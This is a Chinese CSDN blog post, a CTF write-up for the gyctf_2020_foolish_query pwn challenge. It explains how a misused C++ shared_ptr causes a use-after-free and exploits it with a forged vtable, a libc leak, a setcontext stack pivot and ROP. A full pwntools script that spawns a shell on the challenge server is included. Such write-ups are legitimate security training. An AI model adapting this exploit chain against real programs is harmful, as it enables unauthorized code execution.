gyctf_2020_foolish_query(C++中的shared ptr指针的误用)

最新推荐文章于 2021-09-02 17:34:07 发布
最新推荐文章于 2021-09-02 17:34:07 发布
阅读量706 收藏 1
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107598285
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

gyctf_2020_foolish_query(C++中的shared ptr指针的误用)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在Query的构造函数中,如果我们查询的name存在,则将对应的对象从容易里取出,获得其shared_ptr对象,关键在于调用了shared ptrget函数,取得了对象的指针值,用这个指针值创建了一个新的shared_ptr对象。漏洞点在于,从一个shared_ptr对象里取得了被托管的对象的地址值创建了一个新的shared_ptr对象,因此,前面shard_ptr指针里的计数不会被传递给新创建的这个shared_ptr对象,因此这个局部的shared_ptr对象析构时,把受托管的对象也给free掉了。

因此,我们第一次query,创建了一个对象,第二次query这个对象,将使得该对象被free,第三次query将使得程序崩溃,原因是结构体里的指针由于free被破坏了。经过分析,对象的结构体是这样的

struct Node {

   void *func_tables;

   string name;

}

由于UAF,我们可以通过feedback申请堆,将释放的这个结构体申请回来进行伪造。首先,我们通过feedback功能,可以直接获得堆地址

那么我们把伪造的虚表存到堆里先。

_ZN9WordQueryD2Ev = 0x000000000040BF00
_ZN9WordQueryD0Ev = 0x000000000040BF50
_ZNK9WordQuery4evalERK9TextQuery = 0x000000000040BDB0
_ZNK9WordQuery3repB5cxx11Ev = 0x000000000040BE08
_Z11secertQueryv = 0x0000000000402EA9
 
#伪造虚表
feedback(p64(_ZN9WordQueryD2Ev) + p64(_ZN9WordQueryD0Ev) + p64(_ZNK9WordQuery4evalERK9TextQuery) + p64(_ZNK9WordQuery3repB5cxx11Ev))

这个伪造的虚表与程序原来真正的虚表是一模一样的,因为第一步我们的目的不是执行代码,我们得伪造Node结构体里的string对象,进而能够读取任意地址,从而泄露libc地址。

basic_query('a'*0x8)
#UAF
basic_query('a'*0x8)
feedback(p64(fake_vtable_addr) + p64(heap_addr - 0x30) + p64(0x100) + 'a'*0x8) #remote

如上,我们这一步主要是控制了string对象,

因为每次query,都会打印出name,因此控制name,我们可以读取堆里任意地址的数据,我们在后面再通过feedback功能,由于feedback里string对象的扩充,会得到unsorted bin,从而,我们进行query的时候可以泄露unsorted bin里的数据。我们只需要控制string对象里的length成员,即可控制数据泄露的长度。

#制造一个unsorted bin
feedback('b'*0x200)
#泄露出数据
basic_query('a'*0x8)
 
result = sh.recvuntil('bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb',drop = True)
main_arena_88 = u64(result[-8:])

泄露出数据以后,由于找不到合适的one_gadget,因此,我们只能做栈迁移。通过调试,我们发现,在函数虚表里的第三个函数调用时,寄存器状态如下

其中rax指向的就是这个对象,而[rax]指向的就是虚表。我们找到一个合适的gadget

mov rdi, qword ptr [rax] ; 
mov rax, qword ptr [rdi + 0x38] ; 
call qword ptr [rax + 0x20]

因为虚表指针我们可以任意控制,所以rdi的值,我们也可以任意控制,从而rax也可以控制,我们再结合setcontext,即可完成栈迁移,然后做ROP。因此,第二次虚表伪造,我们将第三个函数指针伪造为这个gadget的地址。

#coding:utf8
from pwn import *

context.log_level = 'debug'
#sh = process('./gyctf_2020_foolish_query',env = {'LD_PRELOAD':'./libc-2.23.so'})
#sh = process('./gyctf_2020_foolish_query')
sh = remote('node3.buuoj.cn',29002)
#sh = remote('127.0.0.1',8666)

libc = ELF('./libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']

def basic_query(keyword):
   sh.sendlineafter('6. Exit','1')
   sh.sendlineafter('Keyword:',keyword)

def feedback(content):
   sh.sendlineafter('6. Exit','5')
   sh.sendlineafter('You want to feedback huh?',content)



_ZN9WordQueryD2Ev = 0x000000000040BF00
_ZN9WordQueryD0Ev = 0x000000000040BF50
_ZNK9WordQuery4evalERK9TextQuery = 0x000000000040BDB0
_ZNK9WordQuery3repB5cxx11Ev = 0x000000000040BE08
_Z11secertQueryv = 0x0000000000402EA9

#伪造虚表
feedback(p64(_ZN9WordQueryD2Ev) + p64(_ZN9WordQueryD0Ev) + p64(_ZNK9WordQuery4evalERK9TextQuery) + p64(_ZNK9WordQuery3repB5cxx11Ev))
sh.recvuntil('reward: ')
heap_addr = int(sh.recvuntil('\n',drop = True),16)

fake_vtable_addr = heap_addr + 0x50
print 'fake_vtable_addr=',hex(fake_vtable_addr)
basic_query('a'*0x8)
#UAF
basic_query('a'*0x8)
feedback(p64(fake_vtable_addr) + p64(heap_addr - 0x30) + p64(0x100) + 'a'*0x8) #remote
#制造一个unsorted bin
feedback('b'*0x200)
#泄露出数据
basic_query('a'*0x8)

result = sh.recvuntil('bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb',drop = True)
main_arena_88 = u64(result[-8:])

malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
pop_rdi = libc_base + 0x0000000000021102
#mov rdi, qword ptr [rax] ; mov rax, qword ptr [rdi + 0x38] ; call qword ptr [rax + 0x20]
trans_reg = libc_base + 0x0000000000136aa3
setcontext_x = libc_base + libc.sym['setcontext'] + 0x35
print 'libc_base=',hex(libc_base)
print 'setcontext_x=',hex(setcontext_x)
print 'system_addr=',hex(system_addr)

#伪造虚表
payload = 'v'*0x10 + p64(trans_reg) + p64(_ZNK9WordQuery3repB5cxx11Ev)
payload = payload.ljust(0x38,'c')
payload += p64(heap_addr + 0x32510)
payload += p64(setcontext_x)
rop = p64(binsh_addr) + p64(system_addr)
payload += rop
payload = payload.ljust(0xA0,'c')
payload += p64(heap_addr + 0x32538)
payload += p64(pop_rdi)
feedback(payload)


fake_vtable_addr = heap_addr + 0x324F0

feedback(p64(fake_vtable_addr) + p64(heap_addr + 0x98) + p64(0x8) + 'a'*0x8)
#getshell
basic_query('a'*0x8)

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019_2020学年高英语Module5EthnicCultureSectionⅢIntegratingSkills&Cul
09-09
- "foolish" 形容词,意为“愚蠢的”,用来形容犯了低级错误。 - "furnished" 这里是过去分词作表语,表示“配备有”,常用于描述房间的布置。 - "furniture" 名词,意为“家具”,与前面的 cupboard 并列,都是...
新课标2019_2020学年高英语Unit2WorkingthelandPartⅢGrammar&Writing随堂巩固验收新
09-08
这部分内容主要涉及的是高英语语法和写作的巩固练习,涵盖了动词短语、非谓语动词、固定搭配以及在不同语境的应用。以下是详细的知识点解析: 1. **worth doing sth**:表示“值得做某事”,如句子"This book ...
C++ 智能指针std::shared_ptr误用:堆上同一指针被不同共享指针对象管理
DU_YULIN的博客
09-02 584
文章目录项目场景:问题描述:原因分析:总结 项目场景: 提示:这里简述项目相关背景: 例如:项目场景:示例:通过蓝牙芯片(HC-05)与手机 APP 通信,每隔 5s 传输一批传感器数据(不是很大) 问题描述: 本人在复习《大话设计模式》迭代器模式时,在VS2015用C++实现了书的例子,习惯使然,本人将用共享指针管理所有的堆上指针对象,但是在运行结束时,main函数退出之前,程序出现exception 断,从callstack查看,应该是指针对象delete失败导致的。 C++ 源代码如下:
i春秋2020新春公益赛 GYCTF有关SQL注入题复现
qwzf
07-10 1443
0x00 前言 最近这段时间参加过一些CTF在线竞赛,只做过一点Web题,发现SQL注入漏洞出现的频率可真高!不过在做题也收获了一些SQL注入的新姿势,现在通过题目复现的方式总结一下。 0x01 ...
GYCTF2020_Writeup
Lethe's Blog
03-15 2614
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
UploadFileEx.zip_This Is It
09-23
描述的“Query For Nautanki and els what you think is it true i am doing this kind of foolish thing”似乎是一条不完整的语句,可能是在讨论项目的一些查询功能或者对于某些操作是否明智的自我反思。...
bank-system.rar_Think Smart
09-19
【描述】"Bank System,you think you are very smart,indeed ,you are very foolish" 这句话带有双关意味,既可能是在称赞系统设计者的聪明才智,也可能是在批评他们自以为是的愚蠢。这可能意味着系统在某些方面具有...
2020_2021学年高英语课时素养评价三Unit1FestivalsaroundtheworldUsingLanguage含解析新人教版必修320210227280
08-07
【课件】:这篇内容是针对高英语课程的课时素养评价,具体为2020至2021学年第三学期,人教版必修3 Unit 1 "Festivals around the world" 的"Using Language"部分,包含语法填空和短语应用的练习与解析。...
c++溢出加虚表指针执行任意代码(简笔)
qq_27888595的博客
03-05 205
先把编译器的基址设置好,随机基址的话每次重新启动,程序入口都会变
c++虚函数实现机制及内存模型
mightySheldor的专栏
11-19 6141
前言 大家都应该知道C++的精髓是虚函数吧? 虚函数带来的好处就是: 可以定义一个基类的指针, 其指向一个继承类, 当通过基类的指针去调用函数时, 可以在运行时决定该调用基类的函数还是继承类的函数. 虚函数是实现多态(动态绑定)/接口函数的基础. 可以说: 没有虚函数, C++将变得一无是处! 既然是C++的精髓, 那么我们有必要了解一下她的实现方式吗? 有必要! 既然C++是从C语言
深入理解Windows X64调试
weixin_30686845的博客
08-28 871
随着64位操作系统的普及,都开始大力进军x64,X64下的调试机制也发生了改变,与x86相比,添加了许多自己的新特性,之前学习了Windows x64的调试机制,这里本着“拿来主义”的原则与大家分享。 本文属于译文,英文原文链接:http://www.codemachine.com/article_x64deepdive.html 翻译原文地址:深入Windows X64 调试 在正式开始这...
智能指针shared_ptr和unique_ptr,优先使用unique_ptr
阿飞博客
09-02 5267
智能指针是比raw 指针更智能的类,解决 dangling指针或多次删除被指向对象,以及资源泄露问题,通常用来确保指针的寿命和其指向对象的寿命一致。智能指针虽然很智能,但容易被误用,智能也是有代价的。 通常有两大类型的智能指针:独占式unique_ptr和共享式shared_ptr。这两者的区别和使用场景,更适合使用unique_ptr的场景:1.语义简单,即当你不确定使用的指针是不是被分享所有权...
shared_ptr 的使用及注意事项
01-30 3881
1. 声明 #include class UsersBitmap { ... } typedef boost::shared_ptr UsersBitmapPtr; 2. 使用 UsersBitmapPtr login_users_; UsersBitmapPtr temp_login_users(new UsersBitmap());    //指向对象 login_user
看雪CTF 2016_第八题分析
09-06 251
用exeinfo查看发现是x64程序,所以用平常的OD调试器是调试不到的,需要用x64的调试器 我这里是用x64dbug 这个调试器来进行调试分析 经过一步一步调试,发现程序调用RtlMoveMemory 这个api来进行获取我们输入的注册码 Rax的内存地址即为我们输入的假码 我们先不要一步一步分析下去,直接来到提示注册码不正确那里。 我...
USBH_HID_Process
最新发布
06-15
1. **初始化**: 首先,你需要初始化USB Host控制器和USB HID设备驱动,确保设备被识别并加载到系统的HID子系统[^4]。 ```c hid_device = hid_open(device_path, 0); // 使用设备路径打开HID设备 ``` 2. **配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值